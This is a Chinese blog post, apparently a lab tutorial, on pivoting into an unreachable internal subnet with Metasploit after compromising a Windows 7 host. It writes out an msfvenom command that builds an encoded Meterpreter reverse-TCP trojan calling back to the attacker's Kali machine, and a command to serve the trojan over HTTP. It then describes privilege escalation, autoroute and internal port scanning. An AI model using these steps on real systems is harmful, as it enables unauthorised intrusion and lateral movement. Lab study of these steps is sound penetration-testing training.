Pivoting跳板攻击与自动路由

最新推荐文章于 2024-04-15 00:46:40 发布
最新推荐文章于 2024-04-15 00:46:40 发布
阅读量803 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 内网渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/115047231
版权

网络拓扑图及通信原理

我们现在假若得到了192.168.103.101的主机权限,但是我们经过收集信息发现只有该win7主机是出网的,里面还有一个网段的主机不出网,那么这时我们就要使用跳板攻击的方式访问到不出网的主机。这里我们假设出网的网段为192.168.103.0/24,不出网的数据库主机所处网段为192.168.104.0/24,我们在vmware上分别设置好这两个网段。
在这里插入图片描述
vmnet2之前上一章已经配置完成,vmnet3设置DHCP配置
在这里插入图片描述
以下分别是win7windows server2003的网络配置
在这里插入图片描述

在这里插入图片描述

攻击过程

现在我们在kali上生成一个木马文件,然后使用win7下载到本机上,使用管理员的权限运行该文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.101.63(这是kali的NAT映射到外网的IP) lport=4444 -b "\x00\xff" -a x86 --platform windows -e x86/shikata_ga_nai -f exe > msf.exe

在这里插入图片描述
然后在kali上开启一个HTTP服务,使用win7下载到本机上

python -m SimpleHTTPServer 4444

在这里插入图片描述
kali上使用windows/meterpreter/reverse_tcp这个漏洞利用模块,其他操作不再赘述
在这里插入图片描述
进一步提权
在这里插入图片描述
然后我们在meterpreter上使用ipconfig这个命令时,发现了两个网段的IP地址,初步判断有可能是内网敏感数据所处的IP网段
在这里插入图片描述
在这里插入图片描述
不说废话,立马开干!首先使用post/windows/gather/arp_scanner模块对内网信息进行收集
在这里插入图片描述
然后使用自动路由的方式,将192.168.104.0/24这个网段添加到路由表中
在这里插入图片描述
然后将会话拉入后台中,接着我们使用auxiliary/scanner/portscan/tcp这个模块扫描主机开放了哪些端口和服务。这里我们就选了几个常用的端口
在这里插入图片描述
收集完成!
在这里插入图片描述

平凡的学者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
黑客的隐藏术之跳板攻击
Candour_0的博客
03-05 236
黑客的隐藏术之跳板攻击
Pivoting跳板攻击
imtech的博客
01-09 579
MSF 跳板攻击 Pivoting
跳板攻击
weixin_34343308的博客
11-21 1274
原文地址如下:http://www.offensive-security.com/metasploit-unleashed/Pivoting 跳板攻击是一种非常独特的渗透测试技巧-能够使我们入侵到我们无法到达的内部网络。我们使用第一台被入侵的主机作为跳板入侵到内网主机。在这个入侵实例中我们将入侵到一个由不向我们开放的内部网络。 假设我们是某公司的渗透...
内网渗透系列-Pivoting跳板攻击自动由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
最新发布
lza20001103的博客
04-15 873
内网渗透系列-Pivoting跳板攻击自动由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
跳板攻击入侵技术实例解析
11-02 437
网络入侵,安全第一。一个狡猾、高明的入侵者,不会冒然实行动。他们在入侵时前会做足功课,入侵时会通过各种技术手段保护自己,以防被对方发现,引火烧身。其中,跳板技术是攻击者通常采用的技术。下面笔者结合实例,解析攻击入侵中的跳板技术。 1、确定目标 攻击者在通过扫描工具进行定点(IP)扫描或者对某IP段扫描的过程中发现了该系统(服务器)的某个漏洞,然后准备实施攻击。 比如,笔者通过对某...
源代码_自动控制原理_
10-01
自动控制原理是工程领域中至关重要的一个学科,它涉及到信号处理、系统分析与设计等多个方面。MATLAB作为强大的数学计算软件,是进行自动控制理论研究和实践应用的重要工具。在本资源中,我们通过MATLAB的APP ...
Column Pivoting Gauss Elimination Method: Column Pivoting Gauss Elimination Method-matlab开发
05-30
在数值敏感的场景下,可能需要结合其他方法,如部分 pivoting 或者 complete pivoting。 3. 效率考虑:虽然自定义的列旋转高斯消元法可能比MATLAB内置函数慢,但在特定情况下,如矩阵结构特殊或需要控制稳定性时,它...
Gpp.zip_Elimination_gaussian scaled_gpp_partial pivoting_高斯消元法
09-20
通过运行这段代码,我们可以解决线性方程组问题,并观察到与未使用部分高斯消元法相比,计算结果的稳定性是如何提升的。 总结来说,部分高斯消元法(Gaussian elimination with scaled partial pivoting)是解决...
一种改进Ball Pivoting的散乱点云数据重建算法
03-11
一种改进Ball Pivoting的散乱点云数据重建算法
Gauss-Jordan Elimination with Partial Pivoting:Gauss-Jordan Elimination with Partial Pivoting-matlab开发
06-01
该文件包含一个名为“elimgauss03”的函数,该函数使用部分旋转的高斯-乔丹消元法计算矩阵的缩减行梯形形式。 为了尽量减少所需的计算次数,该算法不会计算一些不必要的计算。 例如,给定矩阵一 = 16 2 3 13 5 11 ...
跳板攻击原理
03-03
跳板攻击是黑客常用的攻击方式,如果有兴趣下来自己留着,有用的
跳板攻击入侵技术实例解析.php
12-15
跳板攻击入侵技术实例解析 .php
使用被攻克的系统在网络内部移动PivotSuite
TENCENTSYS的博客
08-24 212
PivotSuite是一个可移植,独立于平台且功能强大的网络pivoting工具包,可帮助红队/渗透测试人员使用受损的系统在网络内部横向移动。它是一个独立的实用程序,因此可以作为服务器或客户端使用。 作为服务器 如果受损的主机可以从我们的攻击机直接访问(正向连接),那么我们则可以在受损的主机上运行pivotsuite作为服务器,并从我们的攻击机访问只能从受损的主机访问的不同的子网主机。 作为客户端...
骇客攻击:跳板攻击与防御(2)(转)
cuiji1279的博客
08-14 286
骇客攻击:跳板攻击与防御(2)(转)[@more@]   二、利用“肉鸡”进行攻击   前面说的都是黑客如何利用“肉鸡”做一些其他的事情,在第二大部分里就要谈一下黑客是如何利用“肉鸡”进行攻击其他计算机和网络行为的。黑客利用...
多层跳板攻击
weixin_45007073的博客
03-27 1867
前言 首先,我们在上一章的基础上,即在Windows Server2003的主机上又发现了另一层的网络,所以我们就必须在以win2003为跳板机,再去访问下一个网段的主机,即多层跳板攻击攻击过程 我们这里使用一台Linux主机为另一个服务器,并设置一个新的网段来进行隔离,原理和上一章的差不多 查看win2003时发现新的网段 然后我们使用arp_scan模块扫描出更多的主机 更新由表并打印出来 然后我们再新开一个socks4a代理,并使用jobs命令查看任务,因为之前使用了1080这个端口
<网络安全>《52 网络攻防专业课<第十五课 - 跳板
Else 的博客
02-26 1905
攻击者入侵被攻击者时,被攻击者可以根据IP地址追踪攻击者来自哪里。攻击者为了隐藏自己的真正IP,通常会采用跳板,如右图, 攻击者通过2个跳板攻击攻击者。即使被攻击者进行反向追踪,也只能追踪到攻击来自跳板2。如果需要进一步追踪,就需要在跳板2上追踪,而在跳板2上也只能追 踪攻击是来自跳板1。如果被攻击者、跳板1、跳板2分布在不同的国家,将使得追踪攻击者成为一个政治问题。
Mysql里的Pivoting
吕纬甫
01-14 708
“这里说的是静态pivoting查询,即用户需要提前知道旋转的属性列的值。对于动态pivoting,需要动态地构造查询字符串。” “pivoting是一项可以将行旋转为列的技法,在执行pivoting时可能会用到聚合。” 先说一下开放架构,它是一种用于频繁更改架构 的一种设计模式。比如在某个时候要对表结构进行修改,用户必须添加、修改或删除列。 有这样一个例子: mysql> select
内网安全之:Metasploit 跳板攻击: 添加由方式
f_carey的博客
09-04 907
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 跳板攻击: 添加由方式1 Metasploit 跳板攻击: 添加由方式原理2 实验环境2.1 建立 meterpreter 反向连接2.2 查看当前系统信息2.3 利用增加的由扫描新网段的主机3 meterpreter 基础命令 1 Metasploit 跳板攻击: 添加由方式.
渗透测试跳板攻击流程及示例代码
程序员三九的博客
01-03 995
渗透测试中的跳板攻击是一种高级的技术,用于在目标网络或系统内深入渗透。它涉及利用一个或多个已被攻破的系统作为“跳板”,从而进一步攻击其他系统或网络资源。这种方法可以帮助绕过网络隔离或安全控制,扩大攻击者的影响范围。
proxychains代理扫描并获取内网服务器权限
weixin_45007073的博客
03-25 2926
Proxychains Proxychains是为了GNU\Linux操作系统而开发的工具,任何TCP连接都可以通过TOR或者SOCKS4,SOCKS5,HTTP/HTTPS由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。 利用思 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值